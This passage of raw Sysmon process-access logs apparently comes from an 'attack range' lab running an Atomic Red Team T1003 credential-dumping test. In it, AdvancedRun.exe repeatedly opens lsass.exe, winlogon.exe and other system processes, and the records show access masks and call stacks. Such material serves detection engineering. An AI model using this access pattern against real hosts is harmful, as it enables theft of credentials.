:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedru